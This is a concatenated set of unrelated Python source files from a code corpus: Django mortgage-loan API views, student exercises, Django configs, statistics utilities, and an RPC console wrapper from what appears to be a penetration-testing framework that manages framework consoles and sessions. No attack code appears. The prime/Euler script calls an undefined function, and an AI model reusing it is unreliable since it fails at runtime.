@decorators.detail_route(methods=['post'], permission_classes=[IsAuthenticated, AllowAdvisorPermission]) def storage(self, *args, **kwargs): instance = self.get_object() instance.create_storage() if not instance.storage: return Response(status=status.HTTP_400_BAD_REQUEST) data = {'id': instance.storage.box_folder_id} return Response(data=data, status=status.HTTP_201_CREATED) # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def new_property_address(self, request, *args, **kwargs): """ Endpoint-property, new property address of loan profile entry. """ view = CommonAddressView view.filters = {'loanprofilev1': kwargs['pk']} view.related_set_attr = 'loanprofilev1_set' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) # actions @decorators.detail_route(methods=['post']) def los_guid(self, *args, **kwargs): """ POST for LOS GUID """ data = {} instance = self.get_object() if instance.encompass_sync_status not in [ LoanProfileV1.ENCOMPASS_NEVER_SYNCED, LoanProfileV1.ENCOMPASS_SYNC_FAILED ]: logger.warning('LOS-GUID-REQUEST-SYNC-BAD-STATUS %s', instance.guid) data['request_submitted'] = False return Response(data=data, status=status.HTTP_400_BAD_REQUEST) preflight_warnings = instance.encompass_sync_warnings() if preflight_warnings: data['request_submitted'] = False data['warnings'] = preflight_warnings logger.warning('LOS-GUID-PREFLIGHT-WARNINGS %s %s', instance.guid, preflight_warnings) return Response(data=data, status=status.HTTP_400_BAD_REQUEST) try: submitted = instance.sync_to_encompass() except Exception: submitted = False data['request_submitted'] = submitted http_status = status.HTTP_201_CREATED if submitted else status.HTTP_400_BAD_REQUEST return Response(data=data, status=http_status) @decorators.detail_route(methods=['post']) def confirm_demographics_questions(self, *args, **kwargs): instance = self.get_object() instance.is_demographics_questions_request_confirmed = True instance.save() return Response(status=status.HTTP_204_NO_CONTENT) @decorators.detail_route(methods=['post']) def credit_request(self, *args, **kwargs): instance = self.get_object() return start_credit_pull(instance.guid) @decorators.detail_route(methods=['patch']) def trigger_respa(self, *args, **kwargs): instance = self.get_object() data = instance.respa_criteria_for_advisor_portal() http_status = status.HTTP_200_OK if instance.trigger_respa_for_advisor_portal() else status.HTTP_400_BAD_REQUEST return Response(data=data, status=http_status) @decorators.detail_route(methods=['get']) def advisor_credit_pdf_view_url(self, *args, **kwargs): instance = self.get_object() summary = instance.find_valid_credit_report_summary() if summary is None: logging.exception("MISMO-CREDIT-SHARED-LINK-FAIL-NO-SUMMARY lp %s", instance.id) data = {'url': ""} resp_status = status.HTTP_404_NOT_FOUND else: #TODO: https://app.asana.com/0/26776562531082/310821218441711 box_file = box_file_get(summary.report_pdf_document.document_id) shared_link = box_file.get_shared_link(access='company', allow_preview=True) data = {'url': shared_link} resp_status = status.HTTP_200_OK return Response(data=data, status=resp_status) @decorators.detail_route(methods=['post']) def unlock_loan(self, *args, **kwargs): instance = self.get_object() if instance.lock_owner != instance.LOCK_OWNER_CHOICES.advisor: instance.update_from_mortgage_profile() instance.lock_owner = instance.LOCK_OWNER_CHOICES.advisor instance.save() data = {'lock_owner': instance.lock_owner} return Response(data, status=status.HTTP_200_OK) class AdvisorLoanProfileV1SyncInProgressView(AdvisorLoanProfileV1View): """ Loan profile view which represents LoanProfile's, which are currently syncing with encompass. """ permission_classes = [IsAuthenticated, AllowAdvisorPermission, ] serializer_class = LoanProfileV1Serializer pagination_class = LargePagePagination ordering = ('-updated') qs_filter_kwargs = { 'is_active': True, 'encompass_sync_status__in': [ LoanProfileV1.ENCOMPASS_READY_TO_SYNC, LoanProfileV1.ENCOMPASS_SYNC_IN_PROGRESS, LoanProfileV1.ENCOMPASS_SYNC_FAILED, ] } advisor_loan_profile_v1_sync_in_progress_view = AdvisorLoanProfileV1SyncInProgressView.as_view({'get': 'list'}) # Credit Request class AdvisorLoanProfileV1CreditRequestResponseView( AdvisorTokenAuthMixin, NestedViewSetMixin, viewsets.ReadOnlyModelViewSet): """ Credit Report View """ permission_classes = [IsAuthenticated, AllowAdvisorPermission] serializer_class = CreditRequestResponseSerializer model = CreditRequestResponse def get_queryset(self): return self.filter_queryset_by_parents_lookups( self.model.objects.all().prefetch_related( Prefetch('credit_report_summary'), Prefetch('credit_report_summary__credit_report_scores'), ) ) # Borrower class AdvisorLoanProfileV1BorrowerV1View(AdvisorLoanProfileV1BorrowerBaseView): """ Base borrower view. """ serializer_class = BorrowerV1Serializer model = BorrowerV1 properties_mapping = { 'address': 'borrowerv1_address', 'mailing_address': 'borrowerv1_mailing_address', 'demographics': 'borrowerv1', 'employment': 'borrowerv1_employment', 'realtor': 'borrowerv1_realtor', } def perform_create(self, serializer): loan_profile_id = self.kwargs['loan_profile'] try: loan_profile = LoanProfileV1.objects.get(id=loan_profile_id) except LoanProfileV1.DoesNotExist: raise Http404('Loan profile with id "{}" does not exist'.format(loan_profile_id)) else: serializer.save(loan_profile=loan_profile) class BorrowerPreviousAddressesView(BorrowerResourcesMixin): """ Base view of borrower previous addresses. """ serializer_class = AddressV1Serializer model = AddressV1 m2m_rel_attr = 'previous_addresses' instance_count_maximum = 10 class BorrowerPreviousEmploymentsView(BorrowerResourcesMixin): """ Base view of borrower employment history. """ serializer_class = EmploymentV1Serializer model = EmploymentV1 m2m_rel_attr = 'previous_employment' instance_count_maximum = 10 # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def address(self, request, *args, **kwargs): """ Endpoint-property, address of employment object. """ view = CommonAddressView view.filters = {'employmentv1_address': kwargs['pk']} view.related_set_attr = 'employmentv1_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def company_address(self, request, *args, **kwargs): """ Endpoint-property, company address of employment object. """ view = CommonAddressView view.filters = {'employmentv1_company_address': kwargs['pk']} view.related_set_attr = 'employmentv1_company_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) class BorrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, BorrowerResourcesMixin): """ Base view of borrower holding assets. """ serializer_class = HoldingAssetV1Serializer model = HoldingAssetV1 m2m_rel_attr = 'holding_assets' # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def institution_address(self, request, *args, **kwargs): """ Endpoint-property, institution address of holding asset object. """ view = CommonAddressView view.filters = {'holdingassetv1_institution_address': kwargs['pk']} view.related_set_attr = 'holdingassetv1_institution_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) class BorrowerVehicleAssetsView(BorrowerResourcesMixin): """ Base view of borrower vehicle assets. """ serializer_class = VehicleAssetV1Serializer model = VehicleAssetV1 m2m_rel_attr = 'vehicle_assets' class BorrowerInsuranceAssetsView(BorrowerResourcesMixin): """ Base view of borrower insurance assets. """ serializer_class = InsuranceAssetV1Serializer model = InsuranceAssetV1 m2m_rel_attr = 'insurance_assets' class BorrowerIncomesView(RestrictIncomesKindCreation, BorrowerResourcesMixin): """ Base view of borrower incomes. """ serializer_class = IncomeV1Serializer model = IncomeV1 m2m_rel_attr = 'income' class BorrowerExpensesView(RestrictKindCreation, BorrowerResourcesMixin): """ Base view of borrower expenses. """ serializer_class = ExpenseV1Serializer model = ExpenseV1 m2m_rel_attr = 'expense' class BorrowerLiabilitiesView(LiabilitiesRestrictionMixin, BorrowerResourcesMixin): """ Base view of borrower liabilities. """ serializer_class = LiabilityV1Serializer model = LiabilityV1 m2m_rel_attr = 'liabilities' # Coborrower class AdvisorLoanProfileV1CoborrowerV1View(AdvisorLoanProfileV1BorrowerBaseView): """ Base borrower view. """ serializer_class = CoborrowerV1Serializer model = CoborrowerV1 properties_mapping = { 'address': 'coborrowerv1_address', 'mailing_address': 'coborrowerv1_mailing_address', 'demographics': 'coborrowerv1', 'employment': 'coborrowerv1_employment', 'realtor': 'coborrowerv1_realtor', } @staticmethod def _create_coborrower(borrower_id, serializer_instance): try: borrower = BorrowerV1.objects.get(id=borrower_id) except BorrowerV1.DoesNotExist: raise Http404('Borrower with id "{}" does not exist'.format(borrower_id)) else: return serializer_instance.save(borrower=borrower) @staticmethod def _restore_coborrower(coborrower_obj, serializer_instance): coborrower_obj.is_active = True coborrower_obj.save() serializer_instance.instance = coborrower_obj return coborrower_obj def perform_create(self, serializer): borrower_id = self.kwargs['borrower'] try: coborrower_obj = CoborrowerV1.objects.get( borrower_id=borrower_id ) except CoborrowerV1.DoesNotExist: return self._create_coborrower( borrower_id=borrower_id, serializer_instance=serializer, ) else: return self._restore_coborrower( coborrower_obj=coborrower_obj, serializer_instance=serializer, ) class CoborrowerPreviousAddressesView(CoborrowerResourcesMixin): """ Base view of coborrower previous addresses. """ serializer_class = AddressV1Serializer model = AddressV1 m2m_rel_attr = 'previous_addresses' instance_count_maximum = 10 class CoborrowerPreviousEmploymentsView(CoborrowerResourcesMixin): """ Base view of borrower employment history. """ serializer_class = EmploymentV1Serializer model = EmploymentV1 m2m_rel_attr = 'previous_employment' instance_count_maximum = 10 # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def address(self, request, *args, **kwargs): """ Endpoint-property, address of employment object. """ view = CommonAddressView view.filters = {'employmentv1_address': kwargs['pk']} view.related_set_attr = 'employmentv1_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def company_address(self, request, *args, **kwargs): """ Endpoint-property, company address of employment object. """ view = CommonAddressView view.filters = {'employmentv1_company_address': kwargs['pk']} view.related_set_attr = 'employmentv1_company_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) class CoborrowerHoldingAssetsView(HoldingAssetsOwnershipMixin, CoborrowerResourcesMixin): """ Base view of coborrower holding assets. """ serializer_class = HoldingAssetV1Serializer model = HoldingAssetV1 m2m_rel_attr = 'holding_assets' # pylint: disable=no-self-use @decorators.detail_route(methods=ENDPOINT_PROPERTY_METHODS) def institution_address(self, request, *args, **kwargs): """ Endpoint-property, institution address of holding asset object. """ view = CommonAddressView view.filters = {'holdingassetv1_institution_address': kwargs['pk']} view.related_set_attr = 'holdingassetv1_institution_address' return view.as_view(CRUD_ACTIONS)(request, *args, **kwargs) class CoborrowerVehicleAssetsView(CoborrowerResourcesMixin): """ Base view of coborrower vehicle assets. """ serializer_class = VehicleAssetV1Serializer model = VehicleAssetV1 m2m_rel_attr = 'vehicle_assets' class CoborrowerInsuranceAssetsView(CoborrowerResourcesMixin): """ Base view of coborrower insurance assets. """ serializer_class = InsuranceAssetV1Serializer model = InsuranceAssetV1 m2m_rel_attr = 'insurance_assets' class CoborrowerIncomesView(RestrictIncomesKindCreation, CoborrowerResourcesMixin): """ Base view of coborrower incomes. """ serializer_class = IncomeV1Serializer model = IncomeV1 m2m_rel_attr = 'income' class CoborrowerExpensesView(RestrictKindCreation, CoborrowerResourcesMixin): """ Base view of coborrower expenses. """ serializer_class = ExpenseV1Serializer model = ExpenseV1 m2m_rel_attr = 'expense' class CoborrowerLiabilitiesView(LiabilitiesRestrictionMixin, CoborrowerResourcesMixin): """ Base view of borrower liabilities. """ serializer_class = LiabilityV1Serializer model = LiabilityV1 m2m_rel_attr = 'liabilities'
6038afd572bebeb6555821f05e0710b04f59d809
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_3/wllgar015/question3.py
73caabd33916af860b5d886602e949a64214f59d
[]
no_license
MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
UTF-8
Python
false
false
1,807
py
#question 3 message=input("Enter the message:\n") repeat=eval(input("Enter the message repeat count:\n")) frame=eval(input("Enter the frame thickness:\n")) def awesome(message, repeat, frame): #Frame 1 is two characters greater than the input string #Printing the string messages would work quite well. #The repeat is how many lines of the top frame you will print. #For example, repeat = 2, you will need to print 2 lines worth of frame #at the top and two at the bottom. The 2 also reflects the lines you would need #at the sides of the message itself. if frame>0: print("+","-"*(len(message)+2*frame),"+",sep="") #counters help a lot ;) count=1 dcount=1 #first loop for top frame for i in range(frame-1): #it is frame-1 because we have printed one of the frames already. range(frame) will result in an extra unneccessary line. print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="") count+=1 dcount+=1 #second loop for message for i in range(repeat): print("|"*frame,message,"|"*frame) #third loop for bottom frame which is the inverse of the top loop count=frame-1 dcount=frame-1 #first loop for top frame for i in range(frame-1): #it is frame-1 because we have printed one of the frames already. range(frame) will result in an extra unneccessary line. print("|"*(count),"+",(len(message)+2*frame-2*dcount)*"-","+","|"*(count),sep="") count-=1 dcount-=1 if frame>0: print("+","-"*(len(message)+2*frame),"+",sep="") awesome(message, repeat, frame)
dc11c2a9a91ce330d48bdf58adb1905e8abc7e5f
219b7903ad9b16acb4790f561952021e60f23abe
/giftexchange/admin.py
671384fdd7635bf9f0761dcda08bdcce3a118864
[]
no_license
astromitts/gifterator3000
40663de82526ef874c05d9385f53e6c2e3cb1625
64a8c420eb7b729c96861aa430f7f15cbe499d3d
refs/heads/master
2023-01-28T06:47:09.110323
2020-12-04T01:43:53
2020-12-04T01:43:53
293,815,931
0
0
null
null
null
null
UTF-8
Python
false
false
608
py
from django.contrib import admin from giftexchange.models import ( GiftExchange, Participant, AppUser, ExchangeAssignment, AppInvitation, MagicLink ) class ParticipantInline(admin.TabularInline): model = Participant fields = ['appuser'] class GiftExchangeAdmin(admin.ModelAdmin): inlines = [ ParticipantInline, ] list_display = ['title', 'date'] admin.site.register(AppUser) admin.site.register(GiftExchange, GiftExchangeAdmin) admin.site.register(Participant) admin.site.register(ExchangeAssignment) admin.site.register(AppInvitation) admin.site.register(MagicLink)
ed6deb8cf63883ec1dce2f0f037fd6877ffbaea1
c8c9278ffb74da44789b310540693c66468b998c
/shop/urls.py
87f494b760e5ec8a18cf0fe7c69c724930fc0633
[]
no_license
danielspring-crypto/ekit
bdfcec4b2ce8e36bb9e692f7a825bfce0bbf4166
560f6fa5522e1cb4a2cf30325b2b1b07beceea3d
refs/heads/main
2023-01-28T00:20:22.058791
2020-12-07T08:33:06
2020-12-07T08:33:06
319,253,641
0
0
null
null
null
null
UTF-8
Python
false
false
301
py
from django.urls import path from .import views app_name = 'shop' urlpatterns = [ path('', views.product_list, name='product_list'), path('<slug:category_slug>/', views.product_list, name='product_list_by_category'), path('<int:id>/<slug:slug>/', views.product_detail, name='product_detail'), ]
1f44b4b6d3e46f04b442fb65029b4ba093647a51
9ae936a9689832a5b22cd12998c5dc5047aee164
/December_2020/December_2020/5_dec_2020/test.py
b410a47a0763433f3d18e060eca479c4c3ca3919
[]
no_license
inderdevkumar/2020-Python-Projects
218320335f352dc340877d1ef62b65605ce4ccfd
210154d092021d8de5f30797af9ad8e193e3c68e
refs/heads/master
2023-02-04T08:47:05.952342
2020-12-25T15:33:27
2020-12-25T15:33:27
322,878,822
0
0
null
null
null
null
UTF-8
Python
false
false
1,596
py
#===================== Function Defination to check prime numbers================================= from itertools import count, islice primes = (n for n in count(2) if all(n % d for d in range(2, n))) print("100th prime is %d" % next(islice(primes, 99, 100))) #===================== Function Defination to Euler of n ================================= def pi_euler1(n): count = 0 potentialprime = 3 prime_lists= [] #To store list of prime numbers deno_list= [] #To store list of denominators which are closed to numerator product= 1 while count < int(user_input_number): if primetest(potentialprime) == True: prime_lists.append(potentialprime) #Appending prime_lists count += 1 potentialprime += 1 else: potentialprime += 1 for value in prime_lists: denominator_list= [i*4 for i in range(1,n)] denominator= denominator_list[min(range(len(denominator_list)), key = lambda i: abs(denominator_list[i]-value))] #Finding the denominator which is closed to numerator deno_list.append(denominator) #Appending deno_list product= product*(value/denominator) #Finding product of expression print("Prime Lists are: ", prime_lists) print("Denominator Lists are: ", deno_list) print(f"pi euler1 for {n} is: ", product*4) #To get the desired output. This calculation is performed if __name__ == "__main__": user_input_number= int(input("Enter the number of terms: ")) #pi_euler1(user_input_number)
3ba42d75b8d7773ba4b0b673f1dbbbdaf2f8c9ec
4a41223e8c8ab33d83c6f213692c6097bb96540d
/eelbrain/_stats/permutation.py
b4e3ec6a2a339c793de3982c33ed7a8d87dbda5e
[ "BSD-3-Clause" ]
permissive
rbaehr/Eelbrain
33ceeee24533581ab3e7569c31e0f6a6c6dfcda1
6301dc256e351fdbb58bbe13ab48fde7bfcf192a
refs/heads/master
2021-07-05T19:19:20.573231
2017-10-03T04:35:23
2017-10-03T04:35:23
104,907,464
0
0
null
2017-09-26T16:03:20
2017-09-26T16:03:20
null
UTF-8
Python
false
false
6,505
py
# Author: Christian Brodbeck <[email protected]> from itertools import izip from math import ceil import random import numpy as np from .._data_obj import NDVar, Var from .._utils import intervals _YIELD_ORIGINAL = 0 # for testing purposes, yield original order instead of permutations def _resample_params(N, samples): """Decide whether to do permutations or random resampling Parameters ---------- N : int Number of observations. samples : int ``samples`` parameter (number of resampling iterations, or < 0 to sample all permutations). Returns ------- actual_n_samples : int Adapted number of resamplings that will be done. samples_param : int Samples parameter for the resample function (-1 to do all permutations, otherwise same as n_samples). """ n_perm = 2 ** N if n_perm - 1 <= samples: samples = -1 if samples < 0: n_samples = n_perm - 1 else: n_samples = samples return n_samples, samples def permute_order(n, samples=10000, replacement=False, unit=None, seed=0): """Generator function to create indices to shuffle n items Parameters ---------- n : int Number of cases. samples : int Number of samples to yield. If < 0, all possible permutations are performed. replacement : bool whether random samples should be drawn with replacement or without. unit : categorial Factor specifying unit of measurement (e.g. subject). If unit is specified, resampling proceeds by first resampling the categories of unit (with or without replacement) and then shuffling the values within units (no replacement). seed : None | int Seed the random state of the relevant randomization module (:mod:`random` or :mod:`numpy.random`) to make replication possible. None to skip seeding (default 0). Returns ------- Iterator over index. """ n = int(n) samples = int(samples) if samples < 0: err = "Complete permutation for resampling through reordering" raise NotImplementedError(err) if _YIELD_ORIGINAL: original = np.arange(n) for _ in xrange(samples): yield original return if seed is not None: np.random.seed(seed) if unit is None: if replacement: for _ in xrange(samples): yield np.random.randint(n, n) else: index = np.arange(n) for _ in xrange(samples): np.random.shuffle(index) yield index else: if replacement: raise NotImplementedError("Replacement and units") else: idx_orig = np.arange(n) idx_perm = np.arange(n) unit_idxs = [np.nonzero(unit == cell)[0] for cell in unit.cells] for _ in xrange(samples): for idx_ in unit_idxs: v = idx_orig[idx_] np.random.shuffle(v) idx_perm[idx_] = v yield idx_perm def permute_sign_flip(n, samples=10000, seed=0, out=None): """Iterate over indices for ``samples`` permutations of the data Parameters ---------- n : int Number of cases. samples : int Number of samples to yield. If < 0, all possible permutations are performed. seed : None | int Seed the random state of the :mod:`random` module to make replication possible. None to skip seeding (default 0). out : array of int8 (n,) Buffer for the ``sign`` variable that is yielded in each iteration. Yields ------ sign : array of int8 (n,) Sign for each case (``1`` or ``-1``; ``sign`` is the same array object but its content modified in every iteration). """ n = int(n) if seed is not None: random.seed(seed) if out is None: out = np.empty(n, np.int8) else: assert out.shape == (n,) if n > 62: # Python 2 limit for xrange if samples < 0: raise NotImplementedError("All possibilities for more than 62 cases") n_groups = ceil(n / 62.) group_size = int(ceil(n / n_groups)) for _ in izip(*(permute_sign_flip(stop - start, samples, None, out[start: stop]) for start, stop in intervals(range(0, n, group_size) + [n]))): yield out return # determine possible number of permutations n_perm_possible = 2 ** n if samples < 0: # do all permutations sample_sequences = xrange(1, n_perm_possible) else: # random resampling sample_sequences = random.sample(xrange(1, n_perm_possible), samples) for seq in sample_sequences: out.fill(1) for i in (i for i, s in enumerate(bin(seq)[-1:1:-1]) if s == '1'): out[i] = -1 yield out def resample(Y, samples=10000, replacement=False, unit=None, seed=0): """ Generator function to resample a dependent variable (Y) multiple times Parameters ---------- Y : Var | NDVar Variable which is to be resampled. samples : int Number of samples to yield. If < 0, all possible permutations are performed. replacement : bool whether random samples should be drawn with replacement or without. unit : categorial Factor specifying unit of measurement (e.g. subject). If unit is specified, resampling proceeds by first resampling the categories of unit (with or without replacement) and then shuffling the values within units (no replacement). seed : None | int Seed the random state of the relevant randomization module (:mod:`random` or :mod:`numpy.random`) to make replication possible. None to skip seeding (default 0). Returns ------- Iterator over Y_resampled. One copy of ``Y`` is made, and this copy is yielded in each iteration with shuffled data. """ if isinstance(Y, Var): pass elif isinstance(Y, NDVar): if not Y.has_case: raise ValueError("Need NDVar with cases") else: raise TypeError("Need Var or NDVar") out = Y.copy('{name}_resampled') for index in permute_order(len(out), samples, replacement, unit, seed): out.x[index] = Y.x yield out
01ebc7eb291e960ec42d8dc23255d61ec4d1af5c
71a28d4bc1c0f32dc9185332ba2142ba823d3e53
/core/urls.py
b9dba265ed605e2da34c2ae8c0cdaf56b88c141d
[]
no_license
ekeydar/train_stops_map
51b1e3a86967851ea16f2e822867f881b91d24fe
acbc1a1a250ca6c3e7f5dde8932301bd4b67c96d
refs/heads/master
2016-09-12T21:17:13.771035
2016-05-27T12:54:46
2016-05-27T12:54:46
59,438,833
0
1
null
null
null
null
UTF-8
Python
false
false
209
py
from django.conf.urls import url from . import views urlpatterns = [ url(r'^stops/$', views.StopList.as_view(), name='stops'), url(r'^stops/(?P<pk>\d+)/$', views.StopDetail.as_view(), name='stop'), ]
ec6e6ad22ab5a96295739ceb492638e945ef5cdd
2734b77a68f6d7e22e8b823418ad1c59fe1a34af
/opengever/dossier/upgrades/to4303.py
0a0901f85458945e5a68304d5dff1c762b0b9236
[]
no_license
4teamwork/opengever.core
5963660f5f131bc12fd0a5898f1d7c8f24a5e2b1
a01bec6c00d203c21a1b0449f8d489d0033c02b7
refs/heads/master
2023-08-30T23:11:27.914905
2023-08-25T14:27:15
2023-08-25T14:27:15
9,788,097
19
8
null
2023-09-14T13:28:56
2013-05-01T08:28:16
Python
UTF-8
Python
false
false
964
py
from ftw.upgrade import ProgressLogger from ftw.upgrade import UpgradeStep from opengever.dossier.templatedossier import TemplateDossier from plone import api from zope.event import notify from zope.lifecycleevent import ObjectModifiedEvent class MigrateTemplateDossierClass(UpgradeStep): def __call__(self): self.setup_install_profile('profile-opengever.dossier.upgrades:4303') self.migrate_template_dossiers() def migrate_template_dossiers(self): catalog = api.portal.get_tool('portal_catalog') brains = catalog.unrestrictedSearchResults( portal_type='opengever.dossier.templatedossier') with ProgressLogger('Migrating templatedossier class', brains) as step: for brain in brains: self.migrate_object(brain.getObject()) step() def migrate_object(self, obj): self.migrate_class(obj, TemplateDossier) notify(ObjectModifiedEvent(obj))
f898bc011b7d9345fbef96b0f970ceb599a3409a
6f1d57238f3b395b04696a16768bcc507f00630c
/A_Comparing_Strings.py
283a2e89d3cfcd5b5fe35998a4154d040395da59
[]
no_license
FazleRabbbiferdaus172/Codeforces_Atcoder_Lightoj_Spoj
024a4a2a627de02e4698709d6ab86179b8301287
6465e693337777e7bd78ef473b4d270ce757a3a2
refs/heads/master
2023-07-01T06:32:14.775294
2021-07-27T17:07:37
2021-07-27T17:07:37
271,202,781
1
0
null
null
null
null
UTF-8
Python
false
false
396
py
import sys s1 = list(input()) s2 = list(input()) d1, d2 = dict(), dict() miss = 0 if len(s1) != len(s2): print("NO") sys.exit(0) for i in range(97, 97+26): d1[chr(i)] = 0 d2[chr(i)] = 0 for i in range(len(s1)): d1[s1[i]] += 1 d2[s2[i]] += 1 if s1[i] != s2[i]: miss += 1 if d1 == d2 and miss == 2: print("YES") else: print("NO")
213d25bf84577a6d3302247cb04c2a0af37c66c0
1abd2d4fe2f01584bf0aab44d7e98e76f7280f9f
/setup.py
5f1ae46c490365023591c75ca903926ea2fd28c3
[]
no_license
yychuang/GenIce
b370c046cb4eec134ab80f7faa36aeb00f52786e
80b836df7208be3d830bd276924a0a91635eded7
refs/heads/main
2023-06-06T18:24:23.242385
2021-06-28T08:57:25
2021-06-28T08:57:25
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,652
py
#!/usr/bin/env python3 from setuptools import setup, find_packages import os import codecs import re # Copied from wheel package here = os.path.abspath(os.path.dirname(__file__)) #README = codecs.open(os.path.join(here, 'README.txt'), encoding='utf8').read() #CHANGES = codecs.open(os.path.join(here, 'CHANGES.txt'), encoding='utf8').read() with codecs.open(os.path.join(os.path.dirname(__file__), 'genice2', '__init__.py'), encoding='utf8') as version_file: metadata = dict( re.findall( r"""__([a-z]+)__ = "([^"]+)""", version_file.read())) long_desc = "".join(open("README.md").readlines()) with open("requirements.txt") as f: requires = [x.strip() for x in f.readlines()] setup(name='GenIce2', python_requires='>=3.6', version=metadata['version'], description='A Swiss army knife to generate hydrogen-disordered ice structures.', long_description=long_desc, long_description_content_type="text/markdown", classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Programming Language :: Python", "Programming Language :: Python :: 3.6", ], author='Masakazu Matsumoto', author_email='[email protected]', url='https://github.com/vitroid/GenIce/', keywords=['genice2', ], license='MIT', packages=find_packages(), install_requires=requires, entry_points={ 'console_scripts': [ 'genice2 = genice2.cli.genice:main', 'analice2 = genice2.cli.analice:main' ] } )
83e984bf7313b99dd2e24c39e24640b35d45e344
a2706c66c4f2769c00fc5f67e1a85742cfa7e17c
/WebSocket/Handle/console.py
71d912effb8fa4a6b590eaf8e05ac2ba4968e4fc
[ "BSD-3-Clause" ]
permissive
Jeromeyoung/viperpython
48800312dcbdde17462d28d45865fbe71febfb11
ba794ee74079285be32191e898daa3e56305c8be
refs/heads/main
2023-09-01T18:59:23.464817
2021-09-26T04:05:36
2021-09-26T04:05:36
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,131
py
# -*- coding: utf-8 -*- # @File : console.py # @Date : 2021/2/26 # @Desc : from Lib.configs import RPC_FRAMEWORK_API_REQ from Lib.log import logger from Lib.method import Method from Lib.rpcclient import RpcClient from Lib.xcache import Xcache class Console(object): def __init__(self): pass @staticmethod def get_active_console(): result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ) if result is None: Xcache.set_console_id(None) return False else: consoles = result.get("consoles") if len(consoles) == 0: consoles_create_opt = {"SkipDatabaseInit": True, 'AllowCommandPassthru': False} result = RpcClient.call(Method.ConsoleCreate, [consoles_create_opt], timeout=RPC_FRAMEWORK_API_REQ) if result is None: Xcache.set_console_id(None) return False else: active_id = int(result.get("id")) Xcache.set_console_id(active_id) return True else: active_id = int(consoles[0].get("id")) Xcache.set_console_id(active_id) return True @staticmethod def reset_active_console(): result = RpcClient.call(Method.ConsoleList, [], timeout=RPC_FRAMEWORK_API_REQ) if result is None: Xcache.set_console_id(None) else: consoles = result.get("consoles") if len(consoles) == 0: pass else: for console in consoles: # 删除已知命令行 cid = int(console.get("id")) params = [cid] RpcClient.call(Method.ConsoleDestroy, params, timeout=RPC_FRAMEWORK_API_REQ) result = RpcClient.call(Method.ConsoleCreate, timeout=RPC_FRAMEWORK_API_REQ) if result is None: Xcache.set_console_id(None) else: active_id = int(result.get("id")) Xcache.set_console_id(active_id) @staticmethod def write(data=None): cid = Xcache.get_console_id() if cid is None: get_active_console_result = Console.get_active_console() if get_active_console_result: cid = Xcache.get_console_id() else: return False, None params = [cid, data.replace("\r\n", "\n")] result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None or result.get("result") == "failure": get_active_console_result = Console.get_active_console() if get_active_console_result: cid = Xcache.get_console_id() params = [cid, data.replace("\r\n", "\n")] result = RpcClient.call(Method.ConsoleWrite, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None or result.get("result") == "failure": return False, None else: return True, result else: return False, result else: return True, result @staticmethod def read(): cid = Xcache.get_console_id() if cid is None: return False, {} params = [cid] result = RpcClient.call(Method.ConsoleRead, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None: return False, {} elif result.get("result") == "failure": logger.warning(f"Cid: {cid}错误") return False, {} else: return True, result @staticmethod def tabs(line=None): cid = Xcache.get_console_id() if cid is None: return False, {} params = [cid, line] result = RpcClient.call(Method.ConsoleTabs, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None or result.get("result") == "failure": logger.warning(f"Cid: {cid}错误") return False, {} else: return True, result @staticmethod def session_detach(): cid = Xcache.get_console_id() if cid is None: return False, {} params = [cid] result = RpcClient.call(Method.ConsoleSessionDetach, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None: return False, {} elif result.get("result") == "failure": logger.warning(f"Cid: {cid}错误") return False, {} else: return True, result @staticmethod def session_kill(): cid = Xcache.get_console_id() if cid is None: return False, {} params = [cid] result = RpcClient.call(Method.ConsoleSessionKill, params, timeout=RPC_FRAMEWORK_API_REQ) if result is None: return False, {} elif result.get("result") == "failure": logger.warning(f"Cid: {cid}错误") return False, {} else: return True, result
c03381a3eb66d32c05604a2226fbaea846f8e98c
c7a6f8ed434c86b4cdae9c6144b9dd557e594f78
/ECE364/.PyCharm40/system/python_stubs/348993582/dbm.py
ac53fcf86f8ad981eb28108dc15d60478a2542de
[]
no_license
ArbalestV/Purdue-Coursework
75d979bbe72106975812b1d46b7d854e16e8e15e
ee7f86145edb41c17aefcd442fa42353a9e1b5d1
refs/heads/master
2020-08-29T05:27:52.342264
2018-04-03T17:59:01
2018-04-03T17:59:01
null
0
0
null
null
null
null
UTF-8
Python
false
false
667
py
# encoding: utf-8 # module dbm # from /usr/lib64/python2.6/lib-dynload/dbm.so # by generator 1.136 # no doc # no imports # Variables with simple values library = 'GNU gdbm' # functions def open(path, flag=None, mode=None): # real signature unknown; restored from __doc__ """ open(path[, flag[, mode]]) -> mapping Return a database object. """ pass # classes class error(Exception): # no doc def __init__(self, *args, **kwargs): # real signature unknown pass __weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """list of weak references to the object (if defined)"""
9726a9fbf16f8881db41c4e2da04c76e619bcd5f
